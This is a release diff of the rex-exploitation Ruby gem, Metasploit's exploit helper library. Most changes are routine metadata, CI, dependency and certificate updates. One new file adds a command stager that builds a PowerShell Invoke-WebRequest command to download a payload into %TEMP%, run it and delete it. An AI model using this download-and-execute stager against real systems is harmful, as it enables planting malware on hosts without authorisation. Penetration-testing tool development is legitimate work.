rex-exploitation 0.1.22 → 0.1.27

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 7d39a57964e969c40a673ee4e9e57dae7608b2266cec6455eb63b11a89432ea2
-  data.tar.gz: d7adb01230ea065c4d59e0ee2b88b1238ab45a191d266c6d38f49cef7f819660
+  metadata.gz: 6af3ee2c6b8d344941a8012d9db6e3eecb171fe86f455cf5691227903d829d36
+  data.tar.gz: 461a8850613ec43afae0ebc895d4abae0dad33feb93cd53bf5058a949d3c621d
 SHA512:
-  metadata.gz: 6ea179c04d3e6f8222a7d5e994822a2c564dc1ade7a9d3c4d1e863eb8e19e9242fbecb24ee241957714c41426e30cacef1c7d71233fe098ea43291053f04e8f2
-  data.tar.gz: 93a10f5c2923faa39f1d01238069893c39964f1f718f9e3abdac594d72e4eba3b6a5a73b519f87a74ea2e779bde838621bf2c618ae17cc8c6b3d1d58bc9f8d1b
+  metadata.gz: 6e52334ebb63559fde83d3251f430ede4a5f301514f2be75653043c221ed57e0d6c0a34f17b950bc0a6b2f007b380dc21aff6e204cbce009dc5e4f6281913619
+  data.tar.gz: 6f1ee703a95a8ad06f6e28ef208f6562e7231ec5ee973d9285bbbd36d12aedd2ce2cedaf846bdb87a2bb997b760f3e7a575a74e034dea0ffaf0946037856f247

data/.github/workflows/verify.yml

@@ -0,0 +1,56 @@
+name: Verify
+
+on:
+  push:
+    branches:
+      - '*'
+  pull_request:
+    branches:
+      - '*'
+
+jobs:
+  test:
+    runs-on: ubuntu-16.04
+    timeout-minutes: 40
+
+    strategy:
+      fail-fast: true
+      matrix:
+        ruby:
+          - 2.6
+          - 2.7
+          - 3.0
+        test_cmd:
+          - bundle exec rspec
+
+    env:
+      RAILS_ENV: test
+
+    name: Ruby ${{ matrix.ruby }} - ${{ matrix.test_cmd }}
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v2
+
+      - uses: actions/setup-ruby@v1
+        with:
+          ruby-version: ${{ matrix.ruby }}
+
+      - name: Setup bundler
+        run: |
+          gem install bundler
+      - uses: actions/cache@v2
+        with:
+          path: vendor/bundle
+          key: ${{ runner.os }}-gems-${{ hashFiles('**/Gemfile.lock') }}
+          restore-keys: |
+            ${{ runner.os }}-gems-
+      - name: Bundle install
+        run: |
+          bundle config path vendor/bundle
+          bundle install --jobs 4 --retry 3
+      - name: ${{ matrix.test_cmd }}
+        run: |
+          echo "${CMD}"
+          bash -c "${CMD}"
+        env:
+          CMD: ${{ matrix.test_cmd }}

data/lib/rex/exploitation/cmdstager.rb

@@ -12,4 +12,5 @@ require 'rex/exploitation/cmdstager/printf'
 require 'rex/exploitation/cmdstager/wget'
 require 'rex/exploitation/cmdstager/curl'
 require 'rex/exploitation/cmdstager/fetch'
-require 'rex/exploitation/cmdstager/lwp-request'
+require 'rex/exploitation/cmdstager/lwprequest'
+require 'rex/exploitation/cmdstager/psh_invokewebrequest'

data/lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb

@@ -0,0 +1,46 @@
+# -*- coding: binary -*-
+
+class Rex::Exploitation::CmdStagerPSHInvokeWebRequest < Rex::Exploitation::CmdStagerBase
+
+  def http?
+    true
+  end
+
+  def user_agent
+    /WindowsPowerShell/
+  end
+
+  def generate(opts = {})
+    if opts[:payload_uri].nil?
+      raise "#{self.class.name}##{__callee__} missing opts[:payload_uri]"
+    end
+
+    opts[:temp] ||= '%TEMP%'
+    opts[:file] ||= "#{Rex::Text.rand_text_alpha(8)}.exe"
+    @payload_path = "#{opts[:temp]}\\#{opts[:file]}"
+
+    super
+  end
+
+  def generate_cmds_payload(opts)
+    # NOTE: This requires PowerShell >= 3.0
+    cmd = "Invoke-WebRequest -OutFile #{@payload_path} #{opts[:payload_uri]}"
+
+    # TODO: Craft a better command line, probably with encoding
+    ["powershell.exe -c #{cmd}"]
+  end
+
+  def generate_cmds_decoder(opts)
+    cmds = []
+
+    cmds << @payload_path
+    cmds << "del #{@payload_path}" unless opts[:nodelete]
+
+    cmds
+  end
+
+  def cmd_concat_operator
+    ' & '
+  end
+
+end

data/lib/rex/exploitation/egghunter.rb

@@ -36,7 +36,7 @@ class Egghunter
     Alias = "win"
 
     module X86
-      Alias = ARCH_X86
+      Alias = Rex::Arch::ARCH_X86
 
       #
       # The egg hunter stub for win/x86.
@@ -250,7 +250,7 @@ EOS
     Alias = "linux"
 
     module X86
-      Alias = ARCH_X86
+      Alias = Rex::Arch::ARCH_X86
 
       #
       # The egg hunter stub for linux/x86.

data/lib/rex/exploitation/omelet.rb

@@ -25,7 +25,7 @@ class Omelet
     Alias = "win"
 
     module X86
-      Alias = ARCH_X86
+      Alias = Rex::Arch::ARCH_X86
 
       #
       # The hunter stub for win/x86.

data/lib/rex/exploitation/version.rb

@@ -1,5 +1,5 @@
 module Rex
   module Exploitation
-    VERSION = "0.1.22"
+    VERSION = "0.1.27"
   end
 end

data/rex-exploitation.gemspec

@@ -6,8 +6,8 @@ require 'rex/exploitation/version'
 Gem::Specification.new do |spec|
   spec.name          = "rex-exploitation"
   spec.version       = Rex::Exploitation::VERSION
-  spec.authors       = ["David Maloney"]
-  spec.email         = ["DMaloney@rapid7.com"]
+  spec.authors       = ['Metasploit Hackers']
+  spec.email         = ['msfdev@metasploit.com']
 
   spec.summary       = %q{Ruby Exploitation(Rex) library for various exploitation helpers}
   spec.description   = %q{This gem contains various helper mechanisms for creating exploits.
@@ -24,10 +24,10 @@ Gem::Specification.new do |spec|
 
   spec.required_ruby_version = '>= 2.2.0'
 
-  spec.add_development_dependency "bundler", "~> 1.13"
-  spec.add_development_dependency "rake", "~> 10.0"
-  spec.add_development_dependency "rspec", "~> 3.0"
+  spec.add_development_dependency "rake"
+  spec.add_development_dependency "rspec"
 
+  spec.add_runtime_dependency 'rexml'
   spec.add_runtime_dependency 'rex-text'
   spec.add_runtime_dependency 'rex-arch'
   spec.add_runtime_dependency 'rex-encoder'

metadata

@@ -1,10 +1,10 @@
 --- !ruby/object:Gem::Specification
 name: rex-exploitation
 version: !ruby/object:Gem::Version
-  version: 0.1.22
+  version: 0.1.27
 platform: ruby
 authors:
-- David Maloney
+- Metasploit Hackers
 autorequire: 
 bindir: exe
 cert_chain:
@@ -64,20 +64,20 @@ cert_chain:
   -----END CERTIFICATE-----
 - |
   -----BEGIN CERTIFICATE-----
-  MIIFIzCCBAugAwIBAgIQDX9ZkVJ2eNVTlibR5ALyJTANBgkqhkiG9w0BAQsFADBy
+  MIIFIzCCBAugAwIBAgIQCMePMbkSxvnPeJhYXIfaxzANBgkqhkiG9w0BAQsFADBy
   MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3
   d3cuZGlnaWNlcnQuY29tMTEwLwYDVQQDEyhEaWdpQ2VydCBTSEEyIEFzc3VyZWQg
-  SUQgQ29kZSBTaWduaW5nIENBMB4XDTE5MTAxNjAwMDAwMFoXDTIwMTAxOTEyMDAw
+  SUQgQ29kZSBTaWduaW5nIENBMB4XDTIwMTAwNzAwMDAwMFoXDTIzMTEwNjEyMDAw
   MFowYDELMAkGA1UEBhMCVVMxFjAUBgNVBAgTDU1hc3NhY2h1c2V0dHMxDzANBgNV
   BAcTBkJvc3RvbjETMBEGA1UEChMKUmFwaWQ3IExMQzETMBEGA1UEAxMKUmFwaWQ3
-  IExMQzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBANHnKegPAghKuZk4
-  Gy1jKaZEXbWc4fxioTemv/F1yIYzAjCWP65qjKtyeeFDe4/kJzG9nseF9oa93YBf
-  1nyEqxNSZMw/sCAZ87lOl713dRi73uxOoszy2PT5xEB+Q5R6cbzExkWG2zrLdXDr
-  so0Bd6VHw+IsAoBBkAq5FrZOJQYGn5VY20xw/2DqtCeoW4QDWyqTnbJmwO9tZrfr
-  3Le2crfk2eOgafaPNhLon5uuIKCZsk2YkUSNURSS3M7gosMwU9Gg4JTBi7X5+oww
-  rY43dJT28YklxmNVu8o5kJxW4dqLKJLOIgSXZ63nceT/EaCSg7DcofHNcUzejFwb
-  M7Zbb2kCAwEAAaOCAcUwggHBMB8GA1UdIwQYMBaAFFrEuXsqCqOl6nEDwGD5LfZl
-  dQ5YMB0GA1UdDgQWBBR18CAeMsIEU+0pXal/XXw9LCtMADAOBgNVHQ8BAf8EBAMC
+  IExMQzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALNTz4zvAy7h/vQp
+  4dr1txXHlABAagkwYYwTMCtHs5PXsJITx/5SAjx5swuaLfze5kPBNF2YImvFlOXY
+  WaB+0PsOnXnaARsDZU683xFlj8izU6IN6VrAHzDLKFBzruJENrOJD/ikbEtbjO/q
+  gFbmS9J9v5ohG/pcRSS0t4ZPAwymf8eCp6QsvOKK/Aymp1RhlRaP8N6N5CIpkhz1
+  9p968iCE+DjOXVYxcWE+jE/7uB1dbgrXykNBujMSS3GULOvVEY28n6NCmrPlo23g
+  yRjYVJ2Vy14nBqnxDZ/yRIfWRVjWoT9TsAEbe9gY29oDpSCSs4wSmLQd5zGCpZ9h
+  r0HDFB8CAwEAAaOCAcUwggHBMB8GA1UdIwQYMBaAFFrEuXsqCqOl6nEDwGD5LfZl
+  dQ5YMB0GA1UdDgQWBBTLBL7DTwumVEKtdCdpHVYMXOFeDzAOBgNVHQ8BAf8EBAMC
   B4AwEwYDVR0lBAwwCgYIKwYBBQUHAwMwdwYDVR0fBHAwbjA1oDOgMYYvaHR0cDov
   L2NybDMuZGlnaWNlcnQuY29tL3NoYTItYXNzdXJlZC1jcy1nMS5jcmwwNaAzoDGG
   L2h0dHA6Ly9jcmw0LmRpZ2ljZXJ0LmNvbS9zaGEyLWFzc3VyZWQtY3MtZzEuY3Js
@@ -86,57 +86,57 @@ cert_chain:
   JAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmRpZ2ljZXJ0LmNvbTBOBggrBgEFBQcw
   AoZCaHR0cDovL2NhY2VydHMuZGlnaWNlcnQuY29tL0RpZ2lDZXJ0U0hBMkFzc3Vy
   ZWRJRENvZGVTaWduaW5nQ0EuY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQEL
-  BQADggEBAFpzR9s7lcYKDzSJucOHztEPj+iSIeCzxEw34NTE9M2AfkYIu82c4r2a
-  bzIGmzZWiCGufjOp0gF5xW6sSSJ9n0TqH0nhHhvjtZQkmkGtOBbN1zeYDFS2ozAp
-  sljF/g68Y1eYs3NaFf7kQUa6vb6RdjW3J8M9AQ8gthBt7gr/guVxd/gJUYbdDdBX
-  cWfJJi/X7GVBOBmmvA43qoKideuhOBrVGBHvIF/yO9p23dIiUrGmW9kxXCSxgute
-  JI/W23RbIRksG2pioMhd4dCXq3FLLlkOV1YfCwWixNB+iIhQPPZVaPNfgPhCn4Dt
-  DeGjje/qA4fkLtRmOtb9PUBq3ToRDE4=
+  BQADggEBAN+GL5/myPWg7oH4mVrG7/OhXF1MoYQF0ddaNiqaweEHMuKJBQCVZRbL
+  37HojoKXXv2yyRJBCeTB+ojrxX+5PdLVZa0ss7toWzJ2A1poPXZ1eZvm5xeFD32z
+  YQaTmmNWNI3PCDTyJ2PXUc+bDiNNwcZ7yc5o78UNRvp9Jxghya17Q76c9Ov9wvnv
+  dxxQKWGOQy0m4fBrkyjAyH9Djjn81RbQrqYgPuhd5nD0HjN3VUQLhQbIJrk9TVs0
+  EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
+  9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
   -----END CERTIFICATE-----
-date: 2020-01-16 00:00:00.000000000 Z
+date: 2021-02-11 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
-  name: bundler
+  name: rake
   requirement: !ruby/object:Gem::Requirement
     requirements:
-    - - "~>"
+    - - ">="
       - !ruby/object:Gem::Version
-        version: '1.13'
+        version: '0'
   type: :development
   prerelease: false
   version_requirements: !ruby/object:Gem::Requirement
     requirements:
-    - - "~>"
+    - - ">="
       - !ruby/object:Gem::Version
-        version: '1.13'
+        version: '0'
 - !ruby/object:Gem::Dependency
-  name: rake
+  name: rspec
   requirement: !ruby/object:Gem::Requirement
     requirements:
-    - - "~>"
+    - - ">="
       - !ruby/object:Gem::Version
-        version: '10.0'
+        version: '0'
   type: :development
   prerelease: false
   version_requirements: !ruby/object:Gem::Requirement
     requirements:
-    - - "~>"
+    - - ">="
       - !ruby/object:Gem::Version
-        version: '10.0'
+        version: '0'
 - !ruby/object:Gem::Dependency
-  name: rspec
+  name: rexml
   requirement: !ruby/object:Gem::Requirement
     requirements:
-    - - "~>"
+    - - ">="
       - !ruby/object:Gem::Version
-        version: '3.0'
-  type: :development
+        version: '0'
+  type: :runtime
   prerelease: false
   version_requirements: !ruby/object:Gem::Requirement
     requirements:
-    - - "~>"
+    - - ">="
       - !ruby/object:Gem::Version
-        version: '3.0'
+        version: '0'
 - !ruby/object:Gem::Dependency
   name: rex-text
   requirement: !ruby/object:Gem::Requirement
@@ -211,14 +211,14 @@ description: |-
   This gem contains various helper mechanisms for creating exploits.
                             This includes SEH Overwrite helpers, egghunters, command stagers and more.
 email:
-- DMaloney@rapid7.com
+- msfdev@metasploit.com
 executables: []
 extensions: []
 extra_rdoc_files: []
 files:
+- ".github/workflows/verify.yml"
 - ".gitignore"
 - ".rspec"
-- ".travis.yml"
 - CODE_OF_CONDUCT.md
 - Gemfile
 - LICENSE
@@ -263,8 +263,9 @@ files:
 - lib/rex/exploitation/cmdstager/debug_write.rb
 - lib/rex/exploitation/cmdstager/echo.rb
 - lib/rex/exploitation/cmdstager/fetch.rb
-- lib/rex/exploitation/cmdstager/lwp-request.rb
+- lib/rex/exploitation/cmdstager/lwprequest.rb
 - lib/rex/exploitation/cmdstager/printf.rb
+- lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb
 - lib/rex/exploitation/cmdstager/tftp.rb
 - lib/rex/exploitation/cmdstager/vbs.rb
 - lib/rex/exploitation/cmdstager/wget.rb

data/.travis.yml

@@ -1,6 +0,0 @@
-sudo: false
-group: stable
-cache: bundler
-language: ruby
-rvm:
-  - 2.3.3